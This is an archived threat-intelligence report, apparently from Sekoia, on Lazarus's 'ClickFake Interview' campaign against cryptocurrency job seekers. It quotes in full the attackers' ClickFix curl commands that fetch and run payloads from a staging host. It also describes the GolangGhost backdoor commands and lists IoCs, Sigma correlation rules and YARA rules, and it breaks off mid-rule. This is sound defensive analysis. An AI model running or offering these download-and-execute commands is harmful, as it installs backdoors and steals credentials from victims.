{ "id": "19d79dad-2340-4670-8662-0d3a07d6d384", "created_at": "2026-04-06T00:16:56.093979Z", "updated_at": "2026-04-10T03:38:20.635001Z", "deleted_at": null, "sha1_hash": "ee014dd867eed637d08c84509af57fe141d58c21", "title": "From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2848261, "plain_text": "From Contagious to ClickFake Interview: Lazarus leveraging the\r\nClickFix tactic\r\nBy Amaury G.,\u0026nbsp;Coline Chavane,\u0026nbsp;Felix Aimé\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2025-03-31 · Archived: 2026-04-05 19:12:15 UTC\r\nThis post was originally distributed as a private FLINT report to our customers on 21 March 2025. The report detailed\r\nfindings about the Lazarus ClickFake Interview campaign.\r\nTable of contents\r\nIntroduction\r\nLazarus: a persistent threat to cryptocurrencies\r\nFrom Contagious to ClickFake Interview\r\nNew fake websites for interview\r\nWindows infection chain\r\nmacOS infection chain\r\nFrostyFerret\r\nGolangGhost – An interpreted Go backdoor\r\nInterview schemes: how CeFi become prime targets\r\nDetection \u0026 Hunting Opportunities\r\nConclusion\r\nIoCs and technical details\r\nNetwork\r\nFiles hashes\r\nYARA rules\r\nIntroduction\r\nIn March 2025, Bybit, an UAE-based crypto exchange platform, was targeted by Lazarus, a state-sponsored intrusion set\r\nattributed to the Democratic People’s Republic of Korea (DPRK), leading to the theft of $1.5 billion, which represents a\r\nrecord-breaking crypto heist in history.\r\nThe targeting of the cryptocurrency ecosystem by North-Korean threat groups is not new. Indeed, this country has used\r\ncyber operations as a means to bypass international sanctions and to finance its ballistic missile and nuclear weapons\r\nprograms since at least 2014. According to Chainalysis, in 2024 DPRK threat actors stole more from cryptocurrency\r\nplatforms than ever with an estimated heist of $1.3 billion in 2024 compared to $660.5 million in 2023.\r\nA recent TDR investigation on Lazarus attempts to target the cryptocurrency industry led to the discovery of a malicious\r\ncampaign targeting job seekers with fake job interview websites we dubbed internally ClickFake Interview. Compared to\r\npreviously documented campaigns against job seekers in the cryptocurrency industry like Operation Dream Job and\r\nContagious Interview, ClickFake Interview leverages fake job interview websites to deploy a Go backdoor – GolangGhost –\r\non Windows and macOS environments by using the now infamous ClickFix tactic. \r\nThe infrastructure of ClickFake Interview aligns with technical indicators linked to the Contagious Interview campaign,\r\nwhich has been ongoing since at least December 2022. It led Sekoia’s analysts to assess the investigated campaign is the\r\ncontinuum of Contagious Interview. Indeed, there are similarities between the two campaigns in the process leading to the\r\ninfection using fake job interviews and overlaps in the infrastructure, while different techniques are used to gain initial\r\naccess.\r\nIn this report, we will describe the investigation leading to the discovery of the campaign attributed to Lazarus and dive into\r\nthe infection chain used to target cryptocurrency job seekers.\r\nKey Takeaways\r\nLazarus is a state-sponsored threat actor which has been targeting the cryptocurrency industry since at least 2017 to\r\ngenerate revenue for North Korea. It is characterized by its ability to leverage various tools, malware and infection\r\nvectors and to quickly adapt its Tactics, Techniques and Procedures (TTPs) to evade detection.\r\nTDR investigation on Lazarus attempts to target the cryptocurrency industry led to the discovery of a new campaign\r\ndubbed ClickFake Interview. It uses legitimate job interview websites to leverage the ClickFix tactic and install\r\nWindows and macOS backdoors.\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 1 of 16\n\nThe infection chain varies by operating system: on Windows, a VBS script downloads and executes the\r\nGolangGhost backdoor via NodeJS. While on macOS, a Bash script downloads and extracts malicious components,\r\nthen executes FrostyFerret to steal the system password before launching GolangGhost. This final implant enables\r\nremote control and data theft, including browser information exfiltration.\r\nSekoia’s analysts assess with high confidence that this campaign is in the continuity of Contagious Interview, a\r\ncampaign documented by Palo Alto in November 2023.\r\nThis campaign particularly targets centralised finance entities. It aligns with the 2024 trend of Lazarus shifting from\r\ntargeting decentralised finance to centralised finance.\r\nFake job offers are designed to attract profiles different from software developers and engineers. This may reflect\r\na new Lazarus strategy aimed at targeting cryptocurrency industry employees with limited technical expertise,\r\nmaking them less likely to detect the malicious command during the interview.\r\nLazarus: a persistent threat to cryptocurrencies\r\nLazarus is a state-sponsored intrusion set attributed to the 3rd Department of the Reconnaissance General Bureau of the\r\nDemocratic People’s Republic of Korea (DPRK) and which has been active since at least 2009. Its primary motivation is\r\nto conduct espionage, especially against the defence industry, while it also conducts operations for financial gain, targeting\r\nnotably finance and cryptocurrency entities to extort money. \r\nLazarus has targeted entities in Europe, Japan, Taiwan, South Korea, the Middle East, Latin America and the US. It has\r\nrelied on a wide range of malware and tools to achieve its objectives, leveraging wiper (Sharpknot), spyware (Manuscrypt),\r\nransomware (VHD), trojanised applications (PondRAT), and exploiting open-source and zero-day vulnerabilities. \r\nIts mastery of a broad arsenal of malware is also explained by Lazarus’ ability to constantly evolve in terms of Tactics,\r\nTechniques and Procedures (TTPs), making this threat particularly sophisticated. \r\nLazarus has targeted cryptocurrency entities since at least 2017 to generate revenue for DPRK. It has leveraged several\r\ninfection vectors to achieve its objective. The most common ones used to target cryptocurrency entities, employees, and\r\nusers are supply chain attacks, malicious packages on GitHub, trojanized applications, and fake job offers.\r\nSekoia differentiates Lazarus from other sub-clusters of malicious activity like Bluenoroff, Andariel, and TEMP_Hermit.\r\nDespite infrastructure, malware and tools overlap, they tend to use different Tactics, Techniques, and Procedures (TTPs).\r\nIn February 2025, a TDR investigation on Lazarus attempts to target the cryptocurrency industry led to the discovery of a\r\nmalicious campaign targeting job seekers with fake job interview websites dubbed internally ClickFake Interview. Sekoia\r\nassesses with high confidence that this operation is in the continuity of the Contagious Interview campaign first documented\r\nby Palo Alto.\r\nContagious Interview is a malicious campaign ongoing since at least December 2022 and attributed to Lazarus. It has\r\ntargeted software developers through fake job interviews. Job seekers were contacted to plan a video call for a job interview\r\nvia LinkedIn or X. During the meeting, they were asked to download a project on GitHub, which was infected by the\r\nBeaverTail infostealer. In some cases, BeaverTail downloads a second-stage payload called InvisibleFerret. InvisibleFerret\r\nsupports functions such as remote control, data exfiltration, browser stealing capabilities, and keylogging.\r\nThe objective of Contagious Interview is to obtain remote access and steal sensitive information of a user, including\r\ncredentials, cryptocurrency wallets and browser information. Since Palo Alto documented the campaign in November 2023,\r\nseveral variants have been found. SentinelOne observed further variants of InvisibleFerret targeting macOS environments.\r\nThree variants, FriendlyFerret, FrostyFerret and FlexibleFerret, were deployed during a job interview process on a\r\nlegitimate website. A link with an error message to activate the camera appears, encouraging the target to install or update a\r\nsoftware to launch the interview. Once executed, it downloads the malicious payloads on the targeted device.\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 2 of 16\n\nAs of March 2025, the Contagious Interview campaign is still ongoing. Sekoia’s analysts assess it has evolved in a new sub-campaign, called ClickFake Interview, leveraging fake job interviews to deploy ClickFix tactics and implement Windows\r\nand macOS backdoors. \r\nNew fake websites for interview\r\nIt all starts with operators sending users a URL link on social media, inviting them to a fake cryptocurrency-related\r\ninterview on a website. As an illustration, a post from late 2024 on X highlights a screenshot depicting a conversation with\r\nan operator from the Contagious Interview campaign. During this exchange, the operator conveys interest in a potential\r\nparticipant and suggests they visit a third-party website to engage in a brief remote interview to gather additional insights\r\nabout them.\r\nOnce users land on a fake interview website, they are led through an interview process, encapsulating the following steps:\r\nFilling out a contact form;\r\nResponding to three open-ended questions about cryptocurrencies;\r\nCreating an introductory video using the camera;\r\nPreparing for the interview.\r\nHere is the user’s experience when they first land on the webpage, when they received an invitation link:\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 3 of 16\n\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 4 of 16\n\nWe analysed the latest interface of dozens of fake interview websites that have emerged in early 2025. These sites use\r\nReactJS that dynamically loads the entire website content from a single minified JavaScript file hosted under\r\n/assets/index-[RANDOM].js .\r\nEach website shares the same user interface and stepper, which are populated using data from a JavaScript file generated by\r\nReactJS. Within each minified JS file, there is a structured JSON object. The keys in this object represent invitation\r\nidentifiers – used for the invitation link’s URL https://[DOMAIN]/invite/[UUID] , and the values contain job interview\r\ndetails such as the role, questions, company, test duration, and more. Therefore, each website includes around 10 invitations,\r\neach with its specific data.\r\n{\r\n b2t7f9q1: {\r\n \"uuid\":\"b2t7f9q1\",\r\n \"testName\":\"Archblock-Marketing-Manager\",\r\n \"companyName\":\"Archblock\",\r\n \"roleName\":\"Blockchain Advisor\",\r\n \"questionCount\":3,\r\n \"testDurationInMinute\":\"20\",\r\n \"BackendURL\":\"https://[STAGING C2]\",\r\n \"companyURL\":\"https://www.archblock.com\",\r\n \"timeLimitInMinute\":15,\r\n \"recordTimeInSeconds\":300,\r\n \"redirectURL\":[\r\n \"/invite/b2t7f9q1/quiz\",\r\n \"/invite/b2t7f9q1/vintro\",\r\n \"/invite/b2t7f9q1/iprep\"\r\n ],\r\n \"responsibilities\":[TRUNCATED],\r\n \"keyrequirements\":[TRUNCATED],\r\n \"questions\":[TRUNCATED]\r\n },\r\n k8m1zpu3: {\r\n [...]\r\n },\r\n0:00 / 0:58\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 5 of 16\n\n[...]\r\n}\r\nThe entire setup, meticulously designed to build user trust, proceeds smoothly until the user is asked to enable their camera.\r\nAt this point, an error message appears indicating that the user needs to download a driver to fix the issue. This is where the\r\noperator employs the ClickFix technique.\r\nDepending on the user’s operating system, deduced from the User-Agent of his browser, an error message will be presented\r\nwith commands to copy, paste, and run on their system.\r\nWindows\r\nAccess to your camera or microphone is currently blocked.\r\nThe camera drive discoverer on Windows has a race condition in its cache usage. This means\r\nmultiple processes or threads accessing the cache at the same time can cause problems like:\r\nDevices may not show correctly, or the cache might contain invalid data.\r\nCameras might not appear, or detection might fail when multiple devices are connected.\r\nSome cameras could appear more than once or not be detected at all.\r\nHere is the solution identified for the issue.\r\nOpen Command Prompt on Windows\r\nPress Windows Key + R to open the Run dialog.\r\nType cmd and press Enter. This opens the Command Prompt.\r\nUpdate Camera drivers on Windows\r\nTo automatically update the latest drivers for Windows, use the following curl command.\r\ncurl -k -o “%TEMP%\\nvidiadrivers.zip” https://api.smartdriverfix[.]cloud/nvidiadrivers-kp9s.update \u0026\u0026 powershell -Command “Expand-Archive -Force -Path\r\n‘%TEMP%\\nvidiadrivers.zip’ -DestinationPath ‘%TEMP%\\nvidiadrivers'” \u0026\u0026 wscript\r\n“%TEMP%\\nvidiadrivers\\update.vbs”\r\nMac\r\nAccess to your camera or microphone is currently blocked.The Camera drive discoverer\r\non macOS has a race condition in its cache usage. This means multiple processes or threads\r\naccessing the cache at the same time can cause problems like:Multiple processes accessing\r\nthe cache at the same time may result in incomplete data.Cache access might fail under\r\nheavy use or when multiple threads are involved.Poor handling of concurrent access could\r\nslow things down or cause deadlocks.Connected devices might be skipped, misidentified, or\r\nduplicated during discovery.This makes the component unreliable, especially in multi-threaded or high-load scenarios.Here is the solution identified for the issue.Open Terminal\r\non MacOSPress Command (⌘) + Space on your keyboard. This opens Spotlight Search.In\r\nthe search bar that appears, type “Terminal”.Press Enter, and the Terminal application will\r\nopen.Update FFMPEG Drivers on MacOSTo automatically update the latest FFMPEG\r\nDrivers for MacOS, use the following curl command.\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 6 of 16\n\ncurl -k -o /var/tmp/coremedia.sh https://api.smartdriverfix[.]cloud/coremedia-kp9s.sh \u0026\u0026\r\nchmod +x /var/tmp/coremedia.sh \u0026\u0026 nohup bash /var/tmp/coremedia.sh \u003e/dev/null 2\u003e\u00261 \u0026\r\nThese commands aim to launch curl to download and execute a malicious bash script for macOS users ( coremedia.sh ) or\r\nto download a ZIP archive ( nvidiadrivers.zip ), extract its contents, and run a VBS script ( update.vbs ) within the\r\narchive for Windows users. \r\nIt is worth mentioning that if an incorrect User-Agent is provided when requesting the URLs (here\r\napi.smartdriverfix[.]cloud ), two decoy files are downloaded. An image is provided for macOS users, and for Windows\r\nusers, a decoy archive containing a real driver is provided.\r\nThe diagram below outlines the complete infection chain for both macOS and Windows, following the execution of the\r\nprovided command in the user’s terminal.\r\nOn Windows, a NodeJS downloader is used, whereas on macOS, the process relies on a Bash script. Despite these distinct\r\napproaches, both ultimately lead to the persistent installation of a Go implant on the compromised host. It is worth\r\nmentioning that on macOS a stealer dubbed by the industry FrostyFerret, is executed to retrieve the system password of the\r\nuser.\r\nWindows infection chain\r\nOn Windows, the downloader is launched by the update.vbs script executing the command line cmd /c node nvidia.js. This\r\ndownloader is built on the NodeJS Framework and fetches a ZIP archive named nvidiadrivers.zip hosted at the\r\nfollowing URL https://api.smartdriverfix[.]cloud/nvidiawins-update .\r\nOnce fetched, the archive’s content is extracted under the directory: C:\\Users\\[USERNAME]\\AppData\\Local\\Temp\\nvidia-drivers\\ using the tar utility. Following this, it executes another VBS script called update.vbs present among the\r\nextracted files, and ensures its persistence by calling reg.exe to establish a key named NvidiaDriverUpdate under\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value wscript.exe C:\\Users\\\r\n[USERNAME]\\AppData\\Local\\Temp\\nvidia-drivers\\update.vbs .\r\nThe second update.vbs is designed to execute another Batch file named go_batch.bat which is a launcher offering the\r\nuser a decoy progress bar, thus silently starting the final Go backdoor we called GolangGhost, named nvidiaupdate.go .\r\nmacOS infection chain\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 7 of 16\n\nThe bash downloader dubbed coremedia.sh merely downloads a ZIP archive based on the processor architecture to\r\n/var/tmp/VCam.zip , extracts its content into /var/tmp/VCam/ , and then creates a plist file serving as a service,\r\n/Library/LaunchAgents/com.drive.plist , which points to a bash file named cloud.sh . It then executes a FrostyFerret\r\nstealer named DriverPackX.app to retrieve the user’s system password. \r\nAs for the Windows variant, the cloud.sh file starts without compiling a Go script by issuing the command line ./bin/go\r\nrun server.go .\r\nFrostyFerret\r\nThe file DriverPackX.app is already known and partially documented under the name FrostyFerret by SentinelOne, or as\r\nChromeUpdateAlert by dmpdump. FrostyFerret uses the same icon as Chrome.\r\nWhen executed, it presents a fake window that mirrors the macOS native UI, claiming that Chrome needs access to the\r\nuser’s camera or microphone, followed by a prompt requesting the user’s system password. Regardless of whether the user\r\nenters an empty or incorrect password, an alert appears stating that the password is invalid, and then the password is\r\nexfiltrated to Dropbox. It is likely used after to access the user’s keychain.\r\nGolangGhost – An interpreted Go backdoor\r\nThe Go malware is designed for remote control and data theft and its features have already been partially documented by\r\nSonatype and dmpdump. Due to its backdoor and data-stealing capabilities, we named it GolangGhost. It is designed for\r\nWindows and macOS with Chrome browser stealer capabilities based on the HackBrowserData project. After registering the\r\nvictim with the C2, it accepts a variety of commands to execute, such as:\r\nValue Name Task\r\nqwer COMMAND_INFO Retrieve contextual info about the session\r\nasdf COMMAND_UPLOAD Push a file on the victim’s workstation\r\nzxcv COMMAND_DOWNLOAD Retrieve a file from the victim’s computer\r\nvbcx COMMAND_OSSHELL Execute a shell command\r\nqmwn SHELL_MODE_WAITGETOUT Not implemented\r\nqalp SHELL_MODE_DETACH Not implemented\r\nghdj COMMAND_WAIT Wait for a duration in seconds\r\nr4ys COMMAND_AUTO Launch Chrome stealer\r\n89io AUTO_CHROME_GATHER Not implemented\r\n7ujm AUTO_CHROME_PREFRST Not implemented\r\ngi%# AUTO_CHROME_COOKIE Not implemented\r\nkyci AUTO_CHROME_KEYCHAIN Not implemented\r\ndghh COMMAND_EXIT Send an exit message to the C2 and quit the process\r\nfwe9 MSG_INFO\r\nSend host systems information to the C2. This command is\r\nexecuted in an infinite loop.\r\nSince GolangGhost is interpreted rather than compiled, its analysis is relatively easy. When launched, it creates a unique\r\nrandom ID for each victim, storing it in a .host file within the temporary directory. It ensures that only one instance of the\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 8 of 16\n\nmalware runs on the system at any given time. The .store file, which holds the process ID of the implant can also be\r\nfound, as well as the .ses file that contains a timestamp and the machine identifier.\r\nWhen GolangGhost is executed, it establishes a communication to a hardcoded C2. The following data are sent to the C2 in\r\nan encrypted form via HTTP POST requests:\r\nName Example of raw value before packetMake call\r\nExample of\r\nclear value\r\nbefore\r\npacketMake call\r\nUUID generated, referred as\r\n“MACHINEID_FILE_NAME” \r\n508259eb 508259eb\r\nMSG_INFO function name ZndlOQ== fwe9\r\nDevice name and user name ZGVza3RvcC01MDEyLXZtXHR5cmVsbF93ZWxsaWNr=\r\ndesktop-5012-\r\nvm\\tyrell_wellick\r\nDevice name ZGVza3RvcC01MDEyLXZtd2luZG93cw desktop-5012-vm\r\nOS name d2luZG93cw== windows\r\nProcessor and architecture YW1kNjQ= amd64\r\nCalled\r\n“DAEMON_VERSION” in Go\r\nsource code\r\nMi4wLjE= 2.0.1\r\nA function called packetMake is called to encrypt this data. For each request, this function encrypts the data in RC4 using a\r\nkey of 128 bytes generated on the fly. Next, a byte array is populated with the key, the encrypted data, and the MD5 sum of\r\nboth the key and the encrypted data.\r\nTo conclude, GolangGhost can execute several commands received from the C2. These commands include uploading and\r\ndownloading files, executing shell commands, retrieving contextual information about the infected machine, and stealing\r\nusers’ browsing data. Additionally, the source code contains traces of previously reported malicious domains, suggesting that\r\nthe malware has been adapted or updated over time.\r\nInterview schemes: how CeFi become prime targets\r\nBy collecting data (i.e. JSON objects) included in all the fake interview websites we identified, we were able to determine\r\nwhich companies were unknowingly used as a lure for these fake interviews. Our analysis is based on 184 different\r\ninvitations retrieved from fake interview websites.\r\nAmong these invitations, we found 14 company names used to lure the victim into completing the application process. The\r\ngraph below represents the companies the most used to convince the victim to engage in the interview process.\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 9 of 16\n\nThese companies are all related to the cryptocurrency industry. Nine out of 14 provide centralised financial (CeFi)\r\nservices, which refers to financial services built around cryptocurrency that rely on intermediaries, such as exchanges and\r\nlending platforms, to facilitate transactions. These platforms are called “centralised” because they require users to trust a\r\ncentral entity to manage funds, process transactions, and ensure security. Coinbase, KuCoin, Kraken, Circle, Securitize,\r\nBlockFi, Tether, Bybit and Robinhood are part of these CeFi companies. Among these companies, the majority provide an\r\nexchange platform, while others are stable coin issuers, specialists in tokenised security or offer services for cryptocurrency\r\ntrading.\r\nOnly one company provides decentralised financial (DeFi) services, which is Archblock. The others offer solutions related\r\nto blockchain and cryptocurrency, such as blockchain-based payment solutions, blockchain analysis and compliance\r\nservices. \r\nThis targeting aligns with Lazarus’ focus on cryptocurrency-related entities. It also highlights a trend observed in 2024\r\nwith DPRK-nexus threat actors operating a shift and increasingly targeting CeFi instead of DeFi services.\r\nTDR analysts also investigated the types of jobs employed to lure the targets into downloading the malicious payloads.\r\nIt was found that all the positions were not related to technical profiles in software development. They are mainly jobs of\r\nmanager focusing on business development, asset management, product development or decentralised finance specialists.\r\nThis is a significant change from previous documented campaigns attributed to DPRK-nexus threat actors and based on fake\r\njob interviews, which mainly targeted developers and software engineers.\r\nDetection \u0026 Hunting Opportunities\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 10 of 16\n\nAs detailed previously, the infection chain relies on the use of the ClickFix technique. However, the attacker has adapted this\r\ntechnique to make it more discreet.\r\nIn more typical cases, ClickFix relies either on downloading and executing via mshta.exe, which is quite noticeable, or via\r\npowershell.exe with a relevant commandlet. In this scenario, the attacker uses curl.exe to download their archive, then\r\ndecompresses it using powershell.exe , and finally executes the infection script via wscript.exe . Individually, these\r\nactions are fairly common. It is their sequential execution within a short time frame by the same parent process that makes\r\ndetection possible.\r\nBy using Sigma correlation, this behaviour can be detected by creating individual detection rules for each action (curl\r\ndownloading, uncompress, and script execution) and correlating them based on the hostname and Parent PID on a 2 minutes\r\ntime frame.\r\nname: curl\r\ndetection:\r\n selection:\r\n process.name: 'curl.exe'\r\n process.command_line|contains|all:\r\n - '-k'\r\n - '-o'\r\n - 'temp'\r\n process.parent.pid: '*'\r\n condition: selection\r\n---\r\nname: powershell\r\ndetection:\r\n selection:\r\n process.name: 'powershell.exe'\r\n process.command_line|contains|all:\r\n - 'Expand-Archive'\r\n - 'temp'\r\n - 'force'\r\n process.parent.pid: '*'\r\n condition: selection\r\n---\r\nname: wscript\r\ndetection:\r\n selection:\r\n process.name: 'wscript.exe'\r\n process.command_line|contains: 'temp'\r\n process.parent.pid: '*'\r\n condition: selection\r\n---\r\naction: correlation\r\ntype: temporal\r\nrule:\r\n - curl\r\n - powershell\r\n - wscript\r\ngroup-by:\r\n - host.name\r\n - process.parent.pid\r\ntimespan: 2m\r\nordered: true\r\nN.B.: Filters are primarily added to limit the number of events that need to be aggregated. \r\nIn the rule above, the selection criteria are deliberately strict to correspond to the ClickFake Interview case scenario.\r\nAnother way to look for ClickFake Interview activity within your network is to use the new Sekoia Operating language\r\n(SOL). This language allows extensive hunting capabilities, and is similar to KQL from Microsoft. Below is a simple\r\nexample of how you could use that language for the ClickFake Interview case:\r\nevents\r\n| where timestamp \u003e= ago(7d)\r\n| where process.command_line contains~ \"temp\"\r\n| where process.name in [\"curl.exe\", \"powershell.exe\", \"wscript.exe\"]\r\n| aggregate cmd_line = make_set(process.command_line) by host.name, process.parent.pid\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 11 of 16\n\nWhile the above detection rule and hunting query are good for detecting ClickFake Interview activity, looking at the\r\nRunMRU registry key can be highly reliable as well. The issue is that changes to the key are not frequently logged.\r\nClickFake differs from the traditional ClickFix campaign by first prompting the user to type cmd.exe in the Win+R\r\nwindow, rather than requiring the full malicious command. Therefore in the registry key, the log will contain only cmd.exe\r\nwhich still be a detection opportunity, but more prone to false positives unfortunately.\r\nConclusion\r\nIn the continuity of Contagious Interview attributed to Lazarus, the ClickFake Interview campaign targeted job seekers\r\nworking in the cryptocurrency industry with fake hiring processes leading to the deployment of GolangGhost Windows\r\nand macOS environments. This campaign differs from previous variants of Contagious Interview as it leverages the\r\ninfamous ClickFix tactic to execute backdoors.\r\nThere are similarities between previous documented campaigns related to Contagious Interview and ClickFake Interview.\r\nIndeed, in both cases, the candidates are directed towards legitimate platforms to complete a process of recruitment, which\r\nrequires filling out personal information and answering a few questions. In the case of Contagious Interview, the candidate\r\ncan be asked to execute a backdoored GitHub project on their device, or to accept the installation of a software to enable the\r\naccess to the camera for virtual meeting, leading to the infection.\r\nNevertheless, ClickFake Interview stands out due to its approach of utilising a playbook that incorporates templated\r\nwebsites built with ReactJS and various scenarios that culminate in the ClickFix tactic. This finally leads to the execution of\r\nGolangGhost, which serves as a backdoor and stealer. \r\nThrough our Sekoia C2 Tracker project, we monitored the emergence of new fake interview websites. We noticed that many\r\nof them are updated daily with fresh staging C2 servers, indicating that the operators are highly efficient in automating these\r\nupdates. Furthermore, we observed that several of these websites are suspended on the same day they are created, with\r\nmultiple new sites deployed each day. It may indicate an ongoing legal procedure against this campaign leading to the take\r\ndown of some part of the attacker’s infrastructure.\r\nTDR analysts assess ClickFake Interview aligns with Lazarus’ motivations to make financial gain targeting cryptocurrency\r\nentities. This campaign is also coherent with the latest trend of DPRK-nexus threat actors increasingly targeting centralised\r\nfinance. A particular element of ClickFake Interview is that fake job offers are designed to attract profiles different from\r\nsoftware developers and engineers. This may reflect a new Lazarus strategy targeting cryptocurrency industry employees\r\nwith limited technical expertise, making them less likely to detect the malicious curl command during the interview.\r\nThank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by clicking\r\nhere. You can also contact us at tdr[at]sekoia.io for further discussions, always good to have feedbacks from peers.\r\nIoCs and technical details\r\nAs of 21 March 2025.\r\nNetwork\r\nClickFake Interview website\r\nvid-crypto-assess[.]com\r\nassessiohq[.]com\r\nblockassess[.]com\r\nblockchainjobassessment[.]com\r\nblockchainjobhub[.]com\r\ncandidateinsightinfo[.]com\r\ncoinbase-walet[.]biz\r\ncoinbase-walet[.]me\r\ncompetency-core[.]com\r\ndevchallengehq[.]com\r\nevalassesso[.]com\r\nevalswift[.]com\r\nquickskill-review[.]com\r\njobinterview360[.]com\r\nlivehirehub[.]com\r\ntalenthiring360[.]com\r\nquickassessio[.]com\r\nquickhire360[.]com\r\nquickinterview360[.]com\r\neskillprof[.]com\r\nevalvidz[.]com\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 12 of 16\n\nintervwolf[.]com\r\nvidcruiterinterview[.]com\r\nvidcruitermaster[.]com\r\nvidintermaster[.]com\r\nskillhiretrack[.]com\r\nskillprooflab[.]com\r\ntalentcheck[.]pro\r\ntalentsnaptest[.]com\r\ntalentview360[.]com\r\ntest-wolf[.]com\r\ntoptalentassess[.]com\r\nugethired360[.]com\r\nvidassess360[.]com\r\nvidassesspro[.]com\r\nvideorecruitpro[.]com\r\nvidhirehub[.]com\r\nzenspiretech[.]com\r\nStaging C2\r\napi.camdriverhub[.]cloud\r\napi.camdrivers[.]cloud\r\napi.camdriverstore[.]cloud\r\napi.drivercamhub[.]cloud\r\napi.driversnap[.]cloud\r\napi.driverstream[.]cloud\r\napi.provideodrivers[.]cloud\r\napi.smartdriverfix[.]cloud\r\napi.vcamdriverupdate[.]cloud\r\napi.videocarddrivers[.]cloud\r\napi.videodriverzone[.]cloud\r\napi.videotechdrivers[.]cloud\r\napi.vidtechhub[.]cloud\r\napi.webcamdrivers[.]cloud\r\napi.webcamwizard[.]cloud\r\napi.camdriversupport[.]com\r\napi.camera-drive[.]org\r\napi.camtechdrivers[.]com\r\napi.drivercams[.]cloud\r\napi.drive-release[.]cloud\r\napi.nvidia-drive[.]cloud\r\napi.nvidia-release[.]org\r\napi.nvidia-release[.]us\r\napi.smartdriverfix[.]cloud\r\napi.web-cam[.]cloud\r\nGolangGhost C2\r\nhttp://38.134.148[.]218:8080\r\nhttp://154.62.226[.]22:8080\r\nhttp://72.5.42[.]93:8080\r\nFiles hashes\r\nWindows ZIP 1st stage\r\ne88700d069a856e1a16c0da317a6f18fa626dd2d46dcbee1a7403d2e2d9ed097 (nvidiaupdate.zip)\r\nbfac94bfb53b4c0ac346706b06296353462a26fa3bb09fbfc99e3ca090ec127e (update.vbs)\r\nNodesJS loader\r\n887189269c3594e1a851eb22f7c174a7c28618114b7dbaab6b645f34bd809f5a (nvidia.js)\r\nWindows ZIP 2nd stage\r\ne88700d069a856e1a16c0da317a6f18fa626dd2d46dcbee1a7403d2e2d9ed097 (nvidiadrivers.zip)\r\n6289ef57b1772d78da0e54ba4730b6fc79f5ec1620ff63c3abaebea70190eba9 (update.vbs)\r\nGolangGhost Windows\r\n0cbbf7b2b15b561d47e927c37f6e9339fe418badf49fa5f6fc5c49f0dc981100 (go_batch.bat)\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 13 of 16\n\nef9f49f14149bed09ca9f590d33e07f3a749e1971a31cb19a035da8d84f97aa0 (nvidiaupdate.go)\r\nMacOS 1st stage\r\n3fec701b5e8486081c7062590f4ff947fcf51246cb067f951e90eb43dad930b4 (mediadriver.sh)\r\nf4b4411e403dd5094eef9c8946522fc9a99cf1676c8de5926b3c343264b126e6 (VCam-amd.zip)\r\nd00ca82a32b5e8063492f27dfec225b0888cd6135db3e2af65be3782bbfa16e5 (VCam-intel.zip)\r\nGolangGost MacOS\r\n6e186ada6371f5b970b25c78f38511af8d10faaeaed61042271892a327099925 (cloud.sh)\r\nba81429101a558418c80857781099e299c351b09c8c8ad47df2494634a5332dc (server.go)\r\nFrostyFerret\r\nb7b9e7637a42b5db746f1876a2ecb19330403ecb4ec6f5575db4d94df8ec79e8 (RDriverUpdate or DriverPackX.app)\r\nDummy content (Not malicious, but represents a user who has been exposed by ClickFake Interview)\r\na803c043e12a5dac467fae092b75aa08b461b8e9dd4c769cea375ff87287a361 (mediadriver.jpg)\r\ne52118fc7fc9b14e5a8d9f61dfae8b140488ae6ec6f01f41d9e16782febad5f2 (uvcupdate.zip)\r\nYARA rules\r\nrule apt_Lazarus_MacOs_ClickFake_Interview_bash_installer {\r\n meta:\r\n id = \"0f59e291-ac25-4e9a-89b8-54ea7015f769\"\r\n intrusion_set = \"Lazarus\"\r\n malware = \"GolangGhost\"\r\n description = \"Detects MacOs installer used in ClickFake Interview campaign\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-19\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"2805e6efa8877f5707d8e6b29610894f\"\r\n strings:\r\n $s0 = \"#!/bin/bash\"\r\n $s1 = \"PLISST_FILE=~/Library/\"\r\n $s2 = \"ZIP_URL=$ZIP_\"\r\n $s3 = \"chmod +x\"\r\n condition:\r\n filesize \u003c 5KB and\r\n $s0 at 0 and @s1 \u003c @s2 and @s2 \u003c @s3\r\n}\r\nrule apt_Lazarus_ClickFake_Interview_FrostyFerret {\r\n meta:\r\n id = \"12f06933-b0f0-438f-a139-6d0b25ff32e1\"\r\n malware = \"FrostyFerret\"\r\n intrusion_set = \"Lazarus\"\r\n description = \"Detects FrostyFerret based on strings\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-19\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"69bf17d2fb810df08180f0d5b7ce4537\"\r\n strings:\r\n $ = \"content.dropboxapi.com/2/files/upload\"\r\n $ = \"Failed to get public IP address.\"\r\n $ = \"Failed to convert password to data\"\r\n $ = \"The password you entered is incorrect. Please try again.\"\r\n $ = \"Please enter your password to proceed.\"\r\n condition:\r\n uint32be(0) == 0xcafebabe and\r\n 3 of them\r\n}\r\nrule apt_Lazarus_ClickFake_JavaScript {\r\n meta:\r\n id = \"9037b056-c6a9-4089-a30c-377e7461e83e\"\r\n version = \"1.0\"\r\n 